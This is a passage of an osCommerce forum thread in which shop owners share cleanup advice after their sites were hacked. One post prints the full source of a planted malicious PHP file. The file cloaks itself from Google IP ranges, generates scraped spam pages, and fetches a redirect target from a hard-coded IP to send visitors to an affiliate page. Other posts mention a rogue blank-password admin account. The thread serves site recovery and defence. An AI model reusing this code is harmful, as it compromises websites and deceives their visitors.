Would any of these perhaps explaine the strange folder "yahoo" that was mentioned earlier?

 

Thanks to all again... Thanks![/b]

Absolutely not. These appear to be valid indexing bots that are responsible for indexing your site into common search engines. They would not create folders on your site.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Hi All,

as a mentin before ,I deleted a few files :fly ,ssgfgfgf,block,up,mm,wutt,Iname, all with php ext. , and two folder named (.yahoo) in images folder and add htaccess in admin directory. ThaТ was 48h ago.

For now all is OK.

AНd don't forget to upload robotbs.txt file with this inside:

 

#User-Agent: *

#Allow: /

 

User-agent: Yandex

Disallow: /

 

User-Agent: Googlebot

Allow: /.

Allow: /

 

All the best for All of You in NEW 2010!except hackers!

Michaella

Share this post


Link to post
Share on other sites

To add ,

pls, Delete one file more: cart.php :

---------------------------------------

 

<!-- ingeenhhudsswkf -->

<?php

 

if(isset($_GET['red'])){

$ip=array("66.249.", "66.102.", "209.85.", "72.14.", "74.125.", "64.68.", "64.233.", "216.239.", "8.8.", "173.194.", "4.3.");

$myip=getenv("REMOTE_ADDR");

$myip2=explode(".", $myip);

for($i=0;;$i++){

if($ip[$i]==NULL) break;

$myip3=explode(".", $ip[$i]);

if($myip3[0]==$myip2[0]&&$myip3[1]==$myip2[1]){

exit;

}

 

}

include ('lname.php');

exit;

}

/////////Parser

function crawl_page($url){

$ch = curl_init ();

curl_setopt ($ch, CURLOPT_URL,$url);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_ENCODING , "gzip");

curl_setopt ($ch, CURLOPT_TIMEOUT, 200);

curl_setopt ($ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)");

$result = curl_exec ($ch);

curl_close($ch);

return $result;

}

 

////////Parsing Google

function gen_page($keyword){

$today = date("F j, Y");

$url="http://www.google.ru/search?client=firefox&num=100&hl=en&q=".urlencode($keyword)."&lr=lang_en";

$result=crawl_page($url);

preg_match_all("#<div class=\"s\">(.*)<br>#U", $result, $result_preg);

$s=array();

for ($i=0; $i<count($result_preg[1]); $i++){

$snippet=trim($result_preg[1][$i]);

$snippet=strip_tags($snippet,'<em>');

$snippet=str_replace('em>','b>',$snippet);

$snippet=str_replace("...",". ",$snippet);

$snippet=strip_tags($snippet);

array_push($s,$snippet);

}

shuffle($s);

////////Counter <iframe & td

$c='

 

<html>

<head>

<title>'.ucwords($keyword).'</title>

<meta http-equiv=Content-Type content="text/html; charset=utf-8"/>

<meta http-equiv="Content-Language" content="en"/>

</head>

<body bgcolor="#'.dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).'" text="#'.dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).'">

<h3>'.strtoupper($keyword).'</h3>

<small>'.$today.'</small>';

 

//links

$key = split(" ",$keyword); $skey = "";

for($e=0;$e<sizeof($key)-1;$e++){

$skey .= $key[$e];

$skey .= "%20";

}

if ($skey=="") $skey=$key[0];

else $skey=substr($skey,0,-3);

$result=crawl_page("http://clients1.google.ru/complete/search?hl=en&q=".$skey);

preg_match_all("|\[\"([^\"]+)\",|si",

$result, $out, PREG_PATTERN_ORDER);

$c.='

<div><UL>';

$c .= '<LI><a href="http://'.$_SERVER['SERVER_NAME'].'/.cash/map.html">Sitemap</a></LI>';

//$c .= "<LI><a href='?q=".str_replace(" ","-",$key[0])."'>".$key[0]."</a></LI>";

$cnt = 0;

foreach ($out[1] as $key)

{

$c .= "<LI><a href='?q=".str_replace(" ","-",$key)."'>".$key."</a></LI>";

if ($cnt++ > 2) break;

}

$c.='</UL></div><script src="?red='.$_GET["q"].'"></script><div><UL>';

for($i=0;$i<50;$i++){

$c.="

<LI>".$s[$i]."</LI>";

}

$c.='

</UL></div>

</body>

</html>';

return $c;

}

 

////////Generating Pages

function get_page($key)

{

$f_n="./.cash/".$key.".html";

if (@file_exists($f_n)) return @file_get_contents($f_n);

$keyword=str_replace("-"," ",$key);

$result=gen_page($keyword);

$f=@fopen($f_n,"w");@fwrite($f,$result);@fclose($f);

append_map($key);

return $result;

}

 

////////Generating Map

function gen_map()

{

$f_n="./.cash/map.html";

$head='<html>

<head>

<title>Sitemap</title>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />

<meta http-equiv="Content-Language" content="en-us" />

<meta name="robots" content="index, follow" />

</head>

<body>

<ul>

';

$shab=' <li><a href="http://'.$_SERVER['SERVER_NAME'].'/.cash/map.html">Sitemap</a></li>'."\r\n";

$bottom=' </ul>

</body>

</html>';

 

$result=$head.$shab.$bottom;

$f=@fopen($f_n,"w");@fwrite($f,$result);@fclose($f);

return true;

}

 

////////Adding Pages to Map

function append_map($key)

{

$f_n="./.cash/map.html";

if (!@file_exists($f_n)) gen_map();

$keyword=str_replace("-"," ",$key);

$shab=' <li><a href="http://'.$_SERVER['SERVER_NAME'].'/engine.php?q='.$key.'">'.$keyword.'</a></li>'."\r\n";

$bottom=' </ul>

</body>

</html>';

 

$result=file_get_contents("./.cash/map.html");

$result=str_replace($bottom, "", $result);

$result.=$shab.$bottom;

$f=@fopen($f_n,"w");@fwrite($f,$result);@fclose($f);

 

return true;

}

 

////////Parsing Redirect URL

$timelimit = 20*60;

error_reporting(0);

$lndfile="lname.php";

if(!file_exists($lndfile)||time()-filemtime($lndfile)>$timelimit){

$content = crawl_page("http://92.48.127.76/domain.php?password=d0cd05bf619266a045dfb4a016753a39");

$fp = fopen("lname.php","w+");

fwrite($fp,"window.location = \"http://");

fwrite($fp,$content);

fwrite($fp,"/hitin.php?land=42&affid=33222\";");

fclose($fp);

 

//$url=file_get_contents($f_n);

}

 

 

////////Main Code

 

if ($_GET["q"] != ""){

@mkdir("./.cash");

@chmod("./.cash", 0777);

$page = basename($_GET["q"]);

?><script language="javascript" type="text/javascript">

Cd=document;Cr="&"+Math.random();Cp="&s=1";

Cd.cookie="b=b";if(Cd.cookie)Cp+="&c=1";

Cp+="&t="+(new Date()).getTimezoneOffset();

if(self!=top)Cp+="&f=1";

if(navigator.javaEnabled())Cp+="&j=1";

if(typeof(screen)!='undefined')Cp+="&w="+screen.width+"&h="+

screen.height+"&d="+(screen.colorDepth?screen.colorDepth:screen.pixelDepth);

Cd.write("<img src='http://c.hit.ua/hit?i=23646&g=0&x=2"+Cp+Cr+

"&r="+escape(Cd.referrer)+"&u="+escape(window.location.href)+

"' border='0' wi"+"dth='1' he"+"ight='1'/>");

</script><?

print get_page($page);

exit;

}

?>

 

I would be happy if I helped to someone.

Share this post


Link to post
Share on other sites

Sorry michaella, but just giving out names of hacker files you have found isn't going to help as hackers can use any filenames they like. Just deleting them as you find them isn't going to help either - all malicious files and code have to be removed at the same time, and all security measures applied, otherwise they'll just get back in through a vulnerability that's still open or a file you haven't found yet.


www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Share this post


Link to post
Share on other sites

I just wanted to post a message here to thank everyone for posting the code snip-its and contribs used to harden osComm.

 

My site was hacked just before xmas and I've spent quite a bit of time over the holidays implementing the fixes to prevent further attacks. Being a sw developer has definately helped me to understand what's happening under the covers of osComm but I can see how someone without coding experience would be very put off by the holes. Let's hope the next version of osComm has stronger controls...

 

Thanks everyone!!

 

Steve Raffaele

Western Gecko

Share this post


Link to post
Share on other sites

My site has also experienced this problem with the spam email. I've performed all of the recommended actions, but I noticed one thing that has not been mentioned here: There was an additional administrator account added to osCommerce.

 

The name of the administrator was "ass" and it had a blank password.


Check out Chad's News.

Share this post


Link to post
Share on other sites

My site has also experienced this problem with the spam email. I've performed all of the recommended actions, but I noticed one thing that has not been mentioned here: There was an additional administrator account added to osCommerce.

 

The name of the administrator was "ass" and it had a blank password.


Check out Chad's News.

Share this post


Link to post
Share on other sites

My site has also experienced this problem with the spam email. I've performed all of the recommended actions, but I noticed one thing that has not been mentioned here: There was an additional administrator account added to osCommerce.

 

The name of the administrator was "ass" and it had a blank password.

Did you perform all the necessary actions prior to the hack or after?


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Absolutely not. These appear to be valid indexing bots that are responsible for indexing your site into common search engines. They would not create folders on your site.

 

Thanks alot mdtaylorlrim. A friend of mine confirmed the same info that very evening of my post but I'm greatful someone took to time and confirmed it again =).

Still working with the email problem though.


"I follow no path in life... Instead I walk straight and leave a trail for others to follow..."

www.bandofhand.se

Share this post


Link to post
Share on other sites

OK

I am a very basic user of OSCommerce. After intitial week of install I made a style change, Have added a couple of mods, was very very happy with OSC. Still am

 

However

 

I had alot of automated replies and then unsubscribe requests over Xmas.

Upon further investigation on this forum, etc I discovered my site had been thoroughly hacked with multiple file changes, inserted files, etc

 

I then reinstalled my site from local version.

 

I am now getting this message upon login.

 

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'mysql'@'localhost' (using password: NO) in /home/hosscom/public_html/catalog/admin/includes/functions/database.php on line 19

Unable to connect to database server!

 

What have I done and how can I fix it?

 

I intend to go through the secure your site items on restart.

 

regards

patrick

Share this post


Link to post
Share on other sites

Either,

 

1. the hacker changed the login credentials on the mySQL server, or

2. your backup copy of the configuration.php file still has old info in there for the db login.

 

Either change the configuration.php file or fix the users file in the mySQL.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

thanks for quick response

 

"change the config file" is that catalog/admin/config?

and change it where? to what?

 

and how do you fix a users file in mySQL?

 

through cpanel?

 

regards

 

 

Either,

 

1. the hacker changed the login credentials on the mySQL server, or

2. your backup copy of the configuration.php file still has old info in there for the db login.

 

Either change the configuration.php file or fix the users file in the mySQL.

Share this post


Link to post
Share on other sites

thanks for quick response

 

"change the config file" is that catalog/admin/config?

and change it where? to what?

 

and how do you fix a users file in mySQL?

 

through cpanel?

 

regards

If the storefront will not connect it is the /catalog/includes/configuration.php and if the administration will not connect it is the catalog/admin/includes/configuration.php file.

 

 

To manage the users in your mySQL instance you will have to log into mySQL somehow, as likely provided by your host and most likely it is phpMyAdmin, and look to see what users you now have and either change or edit them as appropriate. I cannot tell you what to change it to, just make sure that your configuration.php and the mySQL both have the same user information.

 

And since it is possible that your mySQL users have been changed by the hacker I would delete all users and create a new mySQL user with the proper permissions to access the db, then put that info into your configuration.php file.

 

A very good site will have one user for the store front with permissions to read all tables, and write permissions to write to only those tables required to complete the sale. Then, a second user for the administration with read/write access to all tables, within reason.

 

 

On another note, I do not use hosting so am not intimately familiar with what hosts now provide in the way of mySQL users. They may only allow you one user and they decide what that user is. Maybe someone else that deals with hosting accounts can help you further.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

thank you mdtaylor

 

yes i cannot connect with either storefront or admin

 

apologies for being a dullard but I cannot see where or what in the config files I should change.

 

I can see mySQL user file in cpanel, Im thinking that this should be ok as the problem of connecting only occurred after I reinstalled from my local site

 

regards

Share this post


Link to post
Share on other sites

Ok, in the /catalog/includes/configuration.php file down near the bottom you will see this:

 

 

define('DB_SERVER', 'what_is_here');

define('DB_SERVER_USERNAME', 'what_is_here');

define('DB_SERVER_PASSWORD', 'what_is_here');

define('DB_DATABASE', 'what_is_here');

define('USE_PCONNECT', 'false');

define('STORE_SESSIONS', 'mysql');

 

 

Everywhere you see "what_is_here" there should be a value specific to your server and mySQL instance.

 

define('DB_SERVER', 'localhost'); //this usually works

define('DB_SERVER_USERNAME', 'what_is_here'); //this you can find in the phpMyAdmin users file

define('DB_SERVER_PASSWORD', 'what_is_here'); //this is the password associated with the user above

define('DB_DATABASE', 'what_is_here'); //this is the database name that all your tables are stored in

//the other lines should work as is

 

 

Using phpMyAdmin click on 'privileges' and see what users are there. You should know what each one is and has access to. If you think you may have been compromised then change the root password and delete all other users. Then create a user for the store. "webguest" for example, and create a password for that user, "webpasw0rd" for example.

 

Then look at 'databases.' One of those should contain all your tables for the shop. Lets say it is 'mystore.'

 

So with this information I look at the /catalog/includes/configure.php file and set the values:

 

define('DB_SERVER', 'localhost'); //this usually works

define('DB_SERVER_USERNAME', 'webguest'); //this you can find in the phpMyAdmin users file

define('DB_SERVER_PASSWORD', 'webpasw0rd'); //this is the password associated with the user above

define('DB_DATABASE', 'mystore'); //this is the database name that all your tables are stored in

//the other lines should work as is

 

 

You did say you had access and can use phpMyAdmin, right? Or did I just waste a lot of time? :o


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

many thanks!!!

 

no time wasted, unless you count a burning with hatred for hackers,,,

 

my site is back up for customers - hoss.com.au

 

however i cannot administer the site

im now getting:

 

The requested URL /admin/login.php was not found on this server.

 

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

 

 

I can see a login.php file is there in my catalog/admin folder so i dont know where to go

 

Im going on the road again in 3 hrs

so I think i am going to have to leave it as it is

ie

hopefully unhacked

still vulnerable

and unadministerable until i return ~ 2 weeks

 

and then go through it with a comb

 

 

thank you for your invaluable help

 

 

 

 

 

Ok, in the /catalog/includes/configuration.php file down near the bottom you will see this:

 

 

define('DB_SERVER', 'what_is_here');

define('DB_SERVER_USERNAME', 'what_is_here');

define('DB_SERVER_PASSWORD', 'what_is_here');

define('DB_DATABASE', 'what_is_here');

define('USE_PCONNECT', 'false');

define('STORE_SESSIONS', 'mysql');

 

 

Everywhere you see "what_is_here" there should be a value specific to your server and mySQL instance.

 

define('DB_SERVER', 'localhost'); //this usually works

define('DB_SERVER_USERNAME', 'what_is_here'); //this you can find in the phpMyAdmin users file

define('DB_SERVER_PASSWORD', 'what_is_here'); //this is the password associated with the user above

define('DB_DATABASE', 'what_is_here'); //this is the database name that all your tables are stored in

//the other lines should work as is

 

 

Using phpMyAdmin click on 'privileges' and see what users are there. You should know what each one is and has access to. If you think you may have been compromised then change the root password and delete all other users. Then create a user for the store. "webguest" for example, and create a password for that user, "webpasw0rd" for example.

 

Then look at 'databases.' One of those should contain all your tables for the shop. Lets say it is 'mystore.'

 

So with this information I look at the /catalog/includes/configure.php file and set the values:

 

define('DB_SERVER', 'localhost'); //this usually works

define('DB_SERVER_USERNAME', 'webguest'); //this you can find in the phpMyAdmin users file

define('DB_SERVER_PASSWORD', 'webpasw0rd'); //this is the password associated with the user above

define('DB_DATABASE', 'mystore'); //this is the database name that all your tables are stored in

//the other lines should work as is

 

 

You did say you had access and can use phpMyAdmin, right? Or did I just waste a lot of time? :o

Share this post


Link to post
Share on other sites

 

however i cannot administer the site

im now getting:

 

The requested URL /admin/login.php was not found on this server.

 

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

That's ok, we have not yet worked on your configure.php in your admin area.

 

 

I can see a login.php file is there in my catalog/admin folder so i dont know where to go

 

Im going on the road again in 3 hrs

so I think i am going to have to leave it as it is

ie

hopefully unhacked

 

If you are leaving town then do everyone a favor and backup your admin folder to your local drive and then delete it off the server. When you return we can fix it. This way the hacker will not be able to continue while you are away and not able to stop him.

 

Have a nice trip! :)


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

×